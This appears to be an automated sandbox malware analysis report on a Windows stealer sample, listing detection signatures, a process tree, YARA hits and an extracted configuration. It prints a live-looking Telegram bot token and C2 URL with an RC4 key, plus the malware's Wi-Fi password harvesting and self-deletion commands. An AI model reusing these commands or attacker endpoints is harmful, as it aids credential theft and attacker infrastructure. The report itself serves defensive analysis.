Play interactive tour

Edit tour

Windows Analysis Report 18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe

Overview

General Information

Sample Name:	18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe
Analysis ID:	553216
MD5:	39bfd2ce7cffeafc8f4d85d89fd6f072
SHA1:	9d0df13ef8de579a2bbfba88e938a836ffab1069
SHA256:	18719d6856a09a622001f1c325067d56afa63bd21fbad25fd23c01b2c0c67472
Tags:	exeOskiStealer
Infos:
Most interesting Screenshot:

Detection

AveMaria Oski Stealer Redline Clipper StormKitty Vidar

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Yara detected Redline Clipper

Sigma detected: Capture Wi-Fi password

Antivirus detection for URL or domain

Antivirus detection for dropped file

Found malware configuration

Multi AV Scanner detection for submitted file

Yara detected Telegram RAT

Yara detected Oski Stealer

Antivirus / Scanner detection for submitted sample

Yara detected StormKitty Stealer

Yara detected Vidar stealer

Yara detected AveMaria stealer

Multi AV Scanner detection for dropped file

Tries to steal Mail credentials (via file / registry access)

Uses netsh to modify the Windows network and firewall settings

Downloads files with wrong headers with respect to MIME Content-Type

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Uses the Telegram API (likely for C&C communication)

Machine Learning detection for sample

May check the online IP address of the machine

Posts data to a JPG file (protocol mismatch)

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Hides that the sample has been downloaded from the Internet (zone.identifier)

Found many strings related to Crypto-Wallets (likely being stolen)

Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)

Tries to harvest and steal browser information (history, passwords, etc)

Detected VMProtect packer

Tries to steal Crypto Currency Wallets

Tries to harvest and steal WLAN passwords

.NET source code contains method to dynamically call methods (often used by packers)

.NET source code contains very large strings

Machine Learning detection for dropped file

C2 URLs / IPs found in malware configuration

Antivirus or Machine Learning detection for unpacked file

Drops PE files to the application program directory (C:\ProgramData)

One or more processes crash

Contains functionality to query locales information (e.g. system language)

May sleep (evasive loops) to hinder dynamic analysis

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Uses code obfuscation techniques (call, push, ret)

Detected potential crypto function

Sample execution stops while process was sleeping (likely an evasion)

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Found evasive API chain (may stop execution after checking a module file name)

Contains functionality to dynamically determine API calls

HTTP GET or POST without a user agent

Downloads executable code via HTTP

Contains long sleeps (>= 3 min)

PE file contains strange resources

Drops PE files

Tries to load missing DLLs

Contains functionality to read the PEB

Checks if the current process is being debugged

Binary contains a suspicious time stamp

PE file contains more sections than normal

Launches processes in debugging mode, may be used to hinder debugging

Creates a process in suspended mode (likely to inject code)

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Yara signature match

Contains functionality to check if a debugger is running (IsDebuggerPresent)

PE file contains sections with non-standard names

Found potential string decryption / allocating functions

Yara detected Credential Stealer

Found dropped PE file which has not been started or loaded

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Entry point lies outside standard sections

Enables debug privileges

Creates a DirectInput object (often for capturing keystrokes)

Is looking for software installed on the system

Queries information about the installed CPU (vendor, model number etc)

Queries the product ID of Windows

AV process strings found (often used to terminate AV products)

Found inlined nop instructions (likely shell or obfuscated code)

Sample file is different than original file name gathered from version info

PE file contains an invalid checksum

Extensive use of GetProcAddress (often used to hide API calls)

Creates a window with clipboard capturing capabilities

Uses taskkill to terminate processes

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Uses Microsoft's Enhanced Cryptographic Provider

Classification

Process Tree

System is w10x64

18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe (PID: 5860 cmdline: "C:\Users\user\Desktop\18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe" MD5: 39BFD2CE7CFFEAFC8F4D85D89FD6F072)

svchoste.exe (PID: 4648 cmdline: "C:\Users\user\AppData\Local\Temp\svchoste.exe" MD5: 9F209B4720986407A79BD4C598087587)

cmd.exe (PID: 6672 cmdline: "C:\Windows\System32\cmd.exe" /c taskkill /pid 4648 & erase C:\Users\user\AppData\Local\Temp\svchoste.exe & RD /S /Q C:\\ProgramData\\216363876181815\\* & exit MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 6676 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

taskkill.exe (PID: 4248 cmdline: taskkill /pid 4648 MD5: 15E2E0ACD891510C6268CB8899F2A1A1)

dll.exe (PID: 5360 cmdline: "C:\Users\user\AppData\Local\Temp\dll.exe" MD5: 461CBDD5B0D2801A736E21AEF6C7CED3)

taskshell.exe (PID: 6056 cmdline: "C:\ProgramData\AMD Driver\taskshell.exe" MD5: B335EEB40D0443DADCDEFC578A23B5DA)

chormuimii.exe (PID: 3556 cmdline: "C:\Users\user\AppData\Local\Temp\chormuimii.exe" MD5: 535BD46107780DBB3425E23C175E85F9)

chormuim.exe (PID: 6504 cmdline: "C:\Users\user\AppData\Local\Temp\chormuim.exe" MD5: 69450EC78E3AA15178A8A90079551137)

cmd.exe (PID: 5880 cmdline: "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All MD5: 4E2ACF4F8A396486AB4268C94A6A245F)

conhost.exe (PID: 5808 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

chcp.com (PID: 1716 cmdline: chcp 65001 MD5: 4900AF1B0DA341B5FCF469D59DAD2593)

netsh.exe (PID: 1304 cmdline: netsh wlan show profile MD5: 98CC37BBF363A38834253E22C80A8F32)

findstr.exe (PID: 4844 cmdline: findstr All MD5: BCC8F29B929DABF5489C9BE6587FF66D)

cmd.exe (PID: 1860 cmdline: "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid MD5: 4E2ACF4F8A396486AB4268C94A6A245F)

conhost.exe (PID: 6644 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

chcp.com (PID: 6744 cmdline: chcp 65001 MD5: 4900AF1B0DA341B5FCF469D59DAD2593)

netsh.exe (PID: 5536 cmdline: netsh wlan show networks mode=bssid MD5: 98CC37BBF363A38834253E22C80A8F32)

WerFault.exe (PID: 404 cmdline: C:\Windows\system32\WerFault.exe -u -p 6504 -s 1360 MD5: 2AFFE478D86272288BBEF5A00BBEF6A0)

WerFault.exe (PID: 756 cmdline: C:\Windows\system32\WerFault.exe -u -p 6504 -s 1360 MD5: 2AFFE478D86272288BBEF5A00BBEF6A0)

taskshell.exe (PID: 3132 cmdline: "C:\ProgramData\AMD Driver\taskshell.exe" MD5: B335EEB40D0443DADCDEFC578A23B5DA)

taskshell.exe (PID: 6772 cmdline: "C:\ProgramData\AMD Driver\taskshell.exe" MD5: B335EEB40D0443DADCDEFC578A23B5DA)

msiexec.exe (PID: 6756 cmdline: C:\Windows\system32\msiexec.exe /V MD5: 4767B71A318E201188A0D0A420C8B608)

cleanup

Malware Configuration

Threatname: Oski

{"C2 url": "aegismd.ca/cgi/", "RC4 Key": "056139954853430408"}

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot1456609378:AAEnBfmWHEJfWWOpiWK1aoQnqzDubVAn7J4/sendMessage"}

Threatname: Vidar

{"C2 url": "aegismd.ca/cgi/", "RC4 Key": "056139954853430408"}

Yara Overview

Dropped Files

Source	Rule	Description	Author	Strings
C:\ProgramData\AMD Driver\taskshell.exe	JoeSecurity_RedlineClipper	Yara detected Redline Clipper	Joe Security
C:\Users\user\AppData\Local\Temp\chormuim.exe	SUSP_NET_NAME_ConfuserEx	Detects ConfuserEx packed file	Arnim Rupp	0x5163b:$name: ConfuserEx 0x51346:$compile: AssemblyTitle
C:\Users\user\AppData\Local\Temp\chormuim.exe	HKTL_NET_GUID_StormKitty	Detects c# red/black-team tools via typelibguid	Arnim Rupp	0x517db:$typelibguid0: a16abbb4-985b-4db2-a80c-21268b26c73d
C:\Users\user\AppData\Local\Temp\svchoste.exe	JoeSecurity_Oski	Yara detected Oski Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000010.00000000.348480456.0000000000312000.00000002.00020000.sdmp	JoeSecurity_RedlineClipper	Yara detected Redline Clipper	Joe Security
00000008.00000000.370467159.00000000027FF000.00000004.00000001.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000008.00000002.406666147.00000000027FF000.00000004.00000001.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000008.00000000.370201907.0000000002691000.00000004.00000001.sdmp	JoeSecurity_StormKitty	Yara detected StormKitty Stealer	Joe Security
00000008.00000000.370201907.0000000002691000.00000004.00000001.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000008.00000000.370201907.0000000002691000.00000004.00000001.sdmp	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
00000004.00000002.330615295.0000000002D05000.00000004.00000040.sdmp	JoeSecurity_Oski_1	Yara detected Oski Stealer	Joe Security
0000000C.00000002.555072443.0000000000D92000.00000002.00020000.sdmp	JoeSecurity_RedlineClipper	Yara detected Redline Clipper	Joe Security
00000007.00000002.555066111.0000000000642000.00000002.00020000.sdmp	JoeSecurity_RedlineClipper	Yara detected Redline Clipper	Joe Security
00000008.00000000.369418381.0000000000730000.00000004.00020000.sdmp	SUSP_NET_NAME_ConfuserEx	Detects ConfuserEx packed file	Arnim Rupp	0x720d1:$name: ConfuserEx 0x70f7b:$compile: AssemblyTitle
00000008.00000000.369418381.0000000000730000.00000004.00020000.sdmp	HKTL_NET_GUID_StormKitty	Detects c# red/black-team tools via typelibguid	Arnim Rupp	0x72e87:$typelibguid0: a16abbb4-985b-4db2-a80c-21268b26c73d
00000008.00000002.405182174.0000000000730000.00000004.00020000.sdmp	SUSP_NET_NAME_ConfuserEx	Detects ConfuserEx packed file	Arnim Rupp	0x720d1:$name: ConfuserEx 0x70f7b:$compile: AssemblyTitle
00000008.00000002.405182174.0000000000730000.00000004.00020000.sdmp	HKTL_NET_GUID_StormKitty	Detects c# red/black-team tools via typelibguid	Arnim Rupp	0x72e87:$typelibguid0: a16abbb4-985b-4db2-a80c-21268b26c73d
0000000C.00000000.330943519.0000000000D92000.00000002.00020000.sdmp	JoeSecurity_RedlineClipper	Yara detected Redline Clipper	Joe Security
00000008.00000000.355408259.0000000002691000.00000004.00000001.sdmp	JoeSecurity_StormKitty	Yara detected StormKitty Stealer	Joe Security
00000008.00000000.355408259.0000000002691000.00000004.00000001.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000008.00000000.355408259.0000000002691000.00000004.00000001.sdmp	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
00000006.00000002.310578337.00000000036B5000.00000004.00000001.sdmp	JoeSecurity_Oski	Yara detected Oski Stealer	Joe Security
00000000.00000002.301530705.0000000012BE1000.00000004.00000001.sdmp	JoeSecurity_Oski	Yara detected Oski Stealer	Joe Security
00000008.00000002.406228414.0000000002691000.00000004.00000001.sdmp	JoeSecurity_StormKitty	Yara detected StormKitty Stealer	Joe Security
00000008.00000002.406228414.0000000002691000.00000004.00000001.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000008.00000002.406228414.0000000002691000.00000004.00000001.sdmp	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
00000008.00000000.356149280.00000000027FF000.00000004.00000001.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000007.00000000.302503110.0000000000642000.00000002.00020000.sdmp	JoeSecurity_RedlineClipper	Yara detected Redline Clipper	Joe Security
00000008.00000000.353524841.0000000000730000.00000004.00020000.sdmp	SUSP_NET_NAME_ConfuserEx	Detects ConfuserEx packed file	Arnim Rupp	0x720d1:$name: ConfuserEx 0x70f7b:$compile: AssemblyTitle
00000008.00000000.353524841.0000000000730000.00000004.00020000.sdmp	HKTL_NET_GUID_StormKitty	Detects c# red/black-team tools via typelibguid	Arnim Rupp	0x72e87:$typelibguid0: a16abbb4-985b-4db2-a80c-21268b26c73d
00000005.00000002.304102093.0000000002341000.00000004.00000001.sdmp	JoeSecurity_RedlineClipper	Yara detected Redline Clipper	Joe Security
00000006.00000002.311291755.0000000004BA0000.00000004.00020000.sdmp	SUSP_NET_NAME_ConfuserEx	Detects ConfuserEx packed file	Arnim Rupp	0x6799d:$name: ConfuserEx 0xa68c:$compile: AssemblyTitle 0x676a8:$compile: AssemblyTitle
00000006.00000002.311291755.0000000004BA0000.00000004.00020000.sdmp	HKTL_NET_GUID_StormKitty	Detects c# red/black-team tools via typelibguid	Arnim Rupp	0x67b3d:$typelibguid0: a16abbb4-985b-4db2-a80c-21268b26c73d
00000006.00000002.311291755.0000000004BA0000.00000004.00020000.sdmp	JoeSecurity_Oski	Yara detected Oski Stealer	Joe Security
00000010.00000002.555084428.0000000000312000.00000002.00020000.sdmp	JoeSecurity_RedlineClipper	Yara detected Redline Clipper	Joe Security
00000006.00000002.310945745.0000000004AF0000.00000004.00020000.sdmp	SUSP_NET_NAME_ConfuserEx	Detects ConfuserEx packed file	Arnim Rupp	0x66a3b:$name: ConfuserEx 0x972a:$compile: AssemblyTitle 0x66746:$compile: AssemblyTitle
00000006.00000002.310945745.0000000004AF0000.00000004.00020000.sdmp	HKTL_NET_GUID_StormKitty	Detects c# red/black-team tools via typelibguid	Arnim Rupp	0x66bdb:$typelibguid0: a16abbb4-985b-4db2-a80c-21268b26c73d
00000006.00000002.310945745.0000000004AF0000.00000004.00020000.sdmp	JoeSecurity_Oski	Yara detected Oski Stealer	Joe Security
00000006.00000002.310112322.0000000002397000.00000004.00000001.sdmp	JoeSecurity_Oski	Yara detected Oski Stealer	Joe Security
Process Memory Space: svchoste.exe PID: 4648	JoeSecurity_Oski_1	Yara detected Oski Stealer	Joe Security
Process Memory Space: svchoste.exe PID: 4648	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: svchoste.exe PID: 4648	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: dll.exe PID: 5360	JoeSecurity_RedlineClipper	Yara detected Redline Clipper	Joe Security
Process Memory Space: taskshell.exe PID: 6056	JoeSecurity_RedlineClipper	Yara detected Redline Clipper	Joe Security
Process Memory Space: chormuim.exe PID: 6504	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: chormuim.exe PID: 6504	JoeSecurity_StormKitty	Yara detected StormKitty Stealer	Joe Security
Process Memory Space: chormuim.exe PID: 6504	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: chormuim.exe PID: 6504	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
Process Memory Space: taskshell.exe PID: 3132	JoeSecurity_RedlineClipper	Yara detected Redline Clipper	Joe Security
Process Memory Space: taskshell.exe PID: 6772	JoeSecurity_RedlineClipper	Yara detected Redline Clipper	Joe Security
Click to see the 41 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
12.0.taskshell.exe.d90000.0.unpack	JoeSecurity_RedlineClipper	Yara detected Redline Clipper	Joe Security
8.2.chormuim.exe.280000.0.unpack	SUSP_NET_NAME_ConfuserEx	Detects ConfuserEx packed file	Arnim Rupp	0x5163b:$name: ConfuserEx 0x51346:$compile: AssemblyTitle
8.2.chormuim.exe.280000.0.unpack	HKTL_NET_GUID_StormKitty	Detects c# red/black-team tools via typelibguid	Arnim Rupp	0x517db:$typelibguid0: a16abbb4-985b-4db2-a80c-21268b26c73d
6.2.chormuimii.exe.37fd950.7.unpack	SUSP_NET_NAME_ConfuserEx	Detects ConfuserEx packed file	Arnim Rupp	0x4f83b:$name: ConfuserEx 0x4f546:$compile: AssemblyTitle
6.2.chormuimii.exe.37fd950.7.unpack	HKTL_NET_GUID_StormKitty	Detects c# red/black-team tools via typelibguid	Arnim Rupp	0x4f9db:$typelibguid0: a16abbb4-985b-4db2-a80c-21268b26c73d
8.0.chormuim.exe.280000.6.unpack	SUSP_NET_NAME_ConfuserEx	Detects ConfuserEx packed file	Arnim Rupp	0x5163b:$name: ConfuserEx 0x51346:$compile: AssemblyTitle
8.0.chormuim.exe.280000.6.unpack	HKTL_NET_GUID_StormKitty	Detects c# red/black-team tools via typelibguid	Arnim Rupp	0x517db:$typelibguid0: a16abbb4-985b-4db2-a80c-21268b26c73d
6.2.chormuimii.exe.36cb892.6.unpack	SUSP_NET_NAME_ConfuserEx	Detects ConfuserEx packed file	Arnim Rupp	0x4f83b:$name: ConfuserEx 0x4f546:$compile: AssemblyTitle
6.2.chormuimii.exe.36cb892.6.unpack	HKTL_NET_GUID_StormKitty	Detects c# red/black-team tools via typelibguid	Arnim Rupp	0x4f9db:$typelibguid0: a16abbb4-985b-4db2-a80c-21268b26c73d
6.2.chormuimii.exe.4bb6362.12.unpack	SUSP_NET_NAME_ConfuserEx	Detects ConfuserEx packed file	Arnim Rupp	0x4f83b:$name: ConfuserEx 0x4f546:$compile: AssemblyTitle
6.2.chormuimii.exe.4bb6362.12.unpack	HKTL_NET_GUID_StormKitty	Detects c# red/black-team tools via typelibguid	Arnim Rupp	0x4f9db:$typelibguid0: a16abbb4-985b-4db2-a80c-21268b26c73d
6.2.chormuimii.exe.37fd950.7.raw.unpack	SUSP_NET_NAME_ConfuserEx	Detects ConfuserEx packed file	Arnim Rupp	0x5163b:$name: ConfuserEx 0x51346:$compile: AssemblyTitle
6.2.chormuimii.exe.37fd950.7.raw.unpack	HKTL_NET_GUID_StormKitty	Detects c# red/black-team tools via typelibguid	Arnim Rupp	0x517db:$typelibguid0: a16abbb4-985b-4db2-a80c-21268b26c73d
6.2.chormuimii.exe.4b05400.8.raw.unpack	SUSP_NET_NAME_ConfuserEx	Detects ConfuserEx packed file	Arnim Rupp	0x5163b:$name: ConfuserEx 0x51346:$compile: AssemblyTitle
6.2.chormuimii.exe.4b05400.8.raw.unpack	HKTL_NET_GUID_StormKitty	Detects c# red/black-team tools via typelibguid	Arnim Rupp	0x517db:$typelibguid0: a16abbb4-985b-4db2-a80c-21268b26c73d
6.2.chormuimii.exe.4b05400.8.raw.unpack	JoeSecurity_Oski	Yara detected Oski Stealer	Joe Security
6.2.chormuimii.exe.4af0000.10.unpack	SUSP_NET_NAME_ConfuserEx	Detects ConfuserEx packed file	Arnim Rupp	0x63e3b:$name: ConfuserEx 0x7b2a:$compile: AssemblyTitle 0x63b46:$compile: AssemblyTitle
6.2.chormuimii.exe.4af0000.10.unpack	HKTL_NET_GUID_StormKitty	Detects c# red/black-team tools via typelibguid	Arnim Rupp	0x63fdb:$typelibguid0: a16abbb4-985b-4db2-a80c-21268b26c73d
6.2.chormuimii.exe.4af0000.10.unpack	JoeSecurity_Oski	Yara detected Oski Stealer	Joe Security
6.2.chormuimii.exe.36b5530.4.unpack	SUSP_NET_NAME_ConfuserEx	Detects ConfuserEx packed file	Arnim Rupp	0x65b9d:$name: ConfuserEx 0x888c:$compile: AssemblyTitle 0x658a8:$compile: AssemblyTitle
4.0.svchoste.exe.b70000.0.unpack	JoeSecurity_Oski	Yara detected Oski Stealer	Joe Security
6.2.chormuimii.exe.36b5530.4.unpack	HKTL_NET_GUID_StormKitty	Detects c# red/black-team tools via typelibguid	Arnim Rupp	0x65d3d:$typelibguid0: a16abbb4-985b-4db2-a80c-21268b26c73d
6.2.chormuimii.exe.36b5530.4.unpack	JoeSecurity_Oski	Yara detected Oski Stealer	Joe Security
6.2.chormuimii.exe.4ba0f62.13.raw.unpack	SUSP_NET_NAME_ConfuserEx	Detects ConfuserEx packed file	Arnim Rupp	0x66a3b:$name: ConfuserEx 0x972a:$compile: AssemblyTitle 0x66746:$compile: AssemblyTitle
6.2.chormuimii.exe.4ba0f62.13.raw.unpack	HKTL_NET_GUID_StormKitty	Detects c# red/black-team tools via typelibguid	Arnim Rupp	0x66bdb:$typelibguid0: a16abbb4-985b-4db2-a80c-21268b26c73d
6.2.chormuimii.exe.4ba0f62.13.raw.unpack	JoeSecurity_Oski	Yara detected Oski Stealer	Joe Security
8.0.chormuim.exe.730000.7.unpack	SUSP_NET_NAME_ConfuserEx	Detects ConfuserEx packed file	Arnim Rupp	0x6ecd1:$name: ConfuserEx 0x6db7b:$compile: AssemblyTitle
8.0.chormuim.exe.730000.7.unpack	HKTL_NET_GUID_StormKitty	Detects c# red/black-team tools via typelibguid	Arnim Rupp	0x6fa87:$typelibguid0: a16abbb4-985b-4db2-a80c-21268b26c73d
8.2.chormuim.exe.730000.1.raw.unpack	SUSP_NET_NAME_ConfuserEx	Detects ConfuserEx packed file	Arnim Rupp	0x720d1:$name: ConfuserEx 0x70f7b:$compile: AssemblyTitle
8.2.chormuim.exe.730000.1.raw.unpack	HKTL_NET_GUID_StormKitty	Detects c# red/black-team tools via typelibguid	Arnim Rupp	0x72e87:$typelibguid0: a16abbb4-985b-4db2-a80c-21268b26c73d
6.2.chormuimii.exe.4c0fb62.11.raw.unpack	JoeSecurity_Oski	Yara detected Oski Stealer	Joe Security
6.2.chormuimii.exe.36b5530.4.raw.unpack	SUSP_NET_NAME_ConfuserEx	Detects ConfuserEx packed file	Arnim Rupp	0x6799d:$name: ConfuserEx 0x10985b:$name: ConfuserEx 0xa68c:$compile: AssemblyTitle 0x676a8:$compile: AssemblyTitle 0xac54a:$compile: AssemblyTitle 0x109566:$compile: AssemblyTitle
6.2.chormuimii.exe.36b5530.4.raw.unpack	HKTL_NET_GUID_StormKitty	Detects c# red/black-team tools via typelibguid	Arnim Rupp	0x67b3d:$typelibguid0: a16abbb4-985b-4db2-a80c-21268b26c73d 0x1099fb:$typelibguid0: a16abbb4-985b-4db2-a80c-21268b26c73d
6.2.chormuimii.exe.36b5530.4.raw.unpack	JoeSecurity_Oski	Yara detected Oski Stealer	Joe Security
12.2.taskshell.exe.d90000.0.unpack	JoeSecurity_RedlineClipper	Yara detected Redline Clipper	Joe Security
5.2.dll.exe.23a3290.1.raw.unpack	JoeSecurity_RedlineClipper	Yara detected Redline Clipper	Joe Security
6.2.chormuimii.exe.4af0000.10.raw.unpack	SUSP_NET_NAME_ConfuserEx	Detects ConfuserEx packed file	Arnim Rupp	0x66a3b:$name: ConfuserEx 0x972a:$compile: AssemblyTitle 0x66746:$compile: AssemblyTitle
6.2.chormuimii.exe.4af0000.10.raw.unpack	HKTL_NET_GUID_StormKitty	Detects c# red/black-team tools via typelibguid	Arnim Rupp	0x66bdb:$typelibguid0: a16abbb4-985b-4db2-a80c-21268b26c73d
6.2.chormuimii.exe.4af0000.10.raw.unpack	JoeSecurity_Oski	Yara detected Oski Stealer	Joe Security
0.2.18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe.12cb1698.5.unpack	JoeSecurity_Oski	Yara detected Oski Stealer	Joe Security
6.2.chormuimii.exe.2406b90.1.raw.unpack	JoeSecurity_Oski	Yara detected Oski Stealer	Joe Security
6.2.chormuimii.exe.4b5ec00.9.unpack	JoeSecurity_Oski	Yara detected Oski Stealer	Joe Security
6.2.chormuimii.exe.36b6492.5.unpack	SUSP_NET_NAME_ConfuserEx	Detects ConfuserEx packed file	Arnim Rupp	0x63e3b:$name: ConfuserEx 0x7b2a:$compile: AssemblyTitle 0x63b46:$compile: AssemblyTitle
6.2.chormuimii.exe.36b6492.5.unpack	HKTL_NET_GUID_StormKitty	Detects c# red/black-team tools via typelibguid	Arnim Rupp	0x63fdb:$typelibguid0: a16abbb4-985b-4db2-a80c-21268b26c73d
6.2.chormuimii.exe.36b6492.5.unpack	JoeSecurity_Oski	Yara detected Oski Stealer	Joe Security
6.2.chormuimii.exe.4b5ec00.9.raw.unpack	JoeSecurity_Oski	Yara detected Oski Stealer	Joe Security
16.0.taskshell.exe.310000.0.unpack	JoeSecurity_RedlineClipper	Yara detected Redline Clipper	Joe Security
6.2.chormuimii.exe.23ad390.2.raw.unpack	SUSP_NET_NAME_ConfuserEx	Detects ConfuserEx packed file	Arnim Rupp	0x5163b:$name: ConfuserEx 0x51346:$compile: AssemblyTitle
6.2.chormuimii.exe.23ad390.2.raw.unpack	HKTL_NET_GUID_StormKitty	Detects c# red/black-team tools via typelibguid	Arnim Rupp	0x517db:$typelibguid0: a16abbb4-985b-4db2-a80c-21268b26c73d
6.2.chormuimii.exe.23ad390.2.raw.unpack	JoeSecurity_Oski	Yara detected Oski Stealer	Joe Security
6.2.chormuimii.exe.36b6492.5.raw.unpack	SUSP_NET_NAME_ConfuserEx	Detects ConfuserEx packed file	Arnim Rupp	0x66a3b:$name: ConfuserEx 0x1088f9:$name: ConfuserEx 0x972a:$compile: AssemblyTitle 0x66746:$compile: AssemblyTitle 0xab5e8:$compile: AssemblyTitle 0x108604:$compile: AssemblyTitle
6.2.chormuimii.exe.36b6492.5.raw.unpack	HKTL_NET_GUID_StormKitty	Detects c# red/black-team tools via typelibguid	Arnim Rupp	0x66bdb:$typelibguid0: a16abbb4-985b-4db2-a80c-21268b26c73d 0x108a99:$typelibguid0: a16abbb4-985b-4db2-a80c-21268b26c73d
6.2.chormuimii.exe.36b6492.5.raw.unpack	JoeSecurity_Oski	Yara detected Oski Stealer	Joe Security
0.2.18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe.12cb1698.5.raw.unpack	JoeSecurity_Oski	Yara detected Oski Stealer	Joe Security
6.2.chormuimii.exe.2406b90.1.unpack	JoeSecurity_Oski	Yara detected Oski Stealer	Joe Security
8.0.chormuim.exe.280000.3.unpack	SUSP_NET_NAME_ConfuserEx	Detects ConfuserEx packed file	Arnim Rupp	0x5163b:$name: ConfuserEx 0x51346:$compile: AssemblyTitle
8.0.chormuim.exe.280000.3.unpack	HKTL_NET_GUID_StormKitty	Detects c# red/black-team tools via typelibguid	Arnim Rupp	0x517db:$typelibguid0: a16abbb4-985b-4db2-a80c-21268b26c73d
7.2.taskshell.exe.640000.0.unpack	JoeSecurity_RedlineClipper	Yara detected Redline Clipper	Joe Security
16.2.taskshell.exe.310000.0.unpack	JoeSecurity_RedlineClipper	Yara detected Redline Clipper	Joe Security
8.0.chormuim.exe.280000.0.unpack	SUSP_NET_NAME_ConfuserEx	Detects ConfuserEx packed file	Arnim Rupp	0x5163b:$name: ConfuserEx 0x51346:$compile: AssemblyTitle
8.0.chormuim.exe.280000.0.unpack	HKTL_NET_GUID_StormKitty	Detects c# red/black-team tools via typelibguid	Arnim Rupp	0x517db:$typelibguid0: a16abbb4-985b-4db2-a80c-21268b26c73d
6.2.chormuimii.exe.4ba0000.14.unpack	SUSP_NET_NAME_ConfuserEx	Detects ConfuserEx packed file	Arnim Rupp	0x65b9d:$name: ConfuserEx 0x888c:$compile: AssemblyTitle 0x658a8:$compile: AssemblyTitle
6.2.chormuimii.exe.4ba0000.14.unpack	HKTL_NET_GUID_StormKitty	Detects c# red/black-team tools via typelibguid	Arnim Rupp	0x65d3d:$typelibguid0: a16abbb4-985b-4db2-a80c-21268b26c73d
6.2.chormuimii.exe.4ba0000.14.unpack	JoeSecurity_Oski	Yara detected Oski Stealer	Joe Security
6.2.chormuimii.exe.4b05400.8.unpack	SUSP_NET_NAME_ConfuserEx	Detects ConfuserEx packed file	Arnim Rupp	0x4f83b:$name: ConfuserEx 0x4f546:$compile: AssemblyTitle
6.2.chormuimii.exe.4b05400.8.unpack	HKTL_NET_GUID_StormKitty	Detects c# red/black-team tools via typelibguid	Arnim Rupp	0x4f9db:$typelibguid0: a16abbb4-985b-4db2-a80c-21268b26c73d
7.0.taskshell.exe.640000.0.unpack	JoeSecurity_RedlineClipper	Yara detected Redline Clipper	Joe Security
8.0.chormuim.exe.730000.4.raw.unpack	SUSP_NET_NAME_ConfuserEx	Detects ConfuserEx packed file	Arnim Rupp	0x720d1:$name: ConfuserEx 0x70f7b:$compile: AssemblyTitle
8.0.chormuim.exe.730000.4.raw.unpack	HKTL_NET_GUID_StormKitty	Detects c# red/black-team tools via typelibguid	Arnim Rupp	0x72e87:$typelibguid0: a16abbb4-985b-4db2-a80c-21268b26c73d
8.0.chormuim.exe.730000.7.raw.unpack	SUSP_NET_NAME_ConfuserEx	Detects ConfuserEx packed file	Arnim Rupp	0x720d1:$name: ConfuserEx 0x70f7b:$compile: AssemblyTitle
8.0.chormuim.exe.730000.7.raw.unpack	HKTL_NET_GUID_StormKitty	Detects c# red/black-team tools via typelibguid	Arnim Rupp	0x72e87:$typelibguid0: a16abbb4-985b-4db2-a80c-21268b26c73d
6.2.chormuimii.exe.2397f90.3.unpack	SUSP_NET_NAME_ConfuserEx	Detects ConfuserEx packed file	Arnim Rupp	0x63e3b:$name: ConfuserEx 0x7b2a:$compile: AssemblyTitle 0x63b46:$compile: AssemblyTitle
6.2.chormuimii.exe.2397f90.3.unpack	HKTL_NET_GUID_StormKitty	Detects c# red/black-team tools via typelibguid	Arnim Rupp	0x63fdb:$typelibguid0: a16abbb4-985b-4db2-a80c-21268b26c73d
6.2.chormuimii.exe.2397f90.3.unpack	JoeSecurity_Oski	Yara detected Oski Stealer	Joe Security
6.2.chormuimii.exe.4bb6362.12.raw.unpack	SUSP_NET_NAME_ConfuserEx	Detects ConfuserEx packed file	Arnim Rupp	0x5163b:$name: ConfuserEx 0x51346:$compile: AssemblyTitle
6.2.chormuimii.exe.4bb6362.12.raw.unpack	HKTL_NET_GUID_StormKitty	Detects c# red/black-team tools via typelibguid	Arnim Rupp	0x517db:$typelibguid0: a16abbb4-985b-4db2-a80c-21268b26c73d
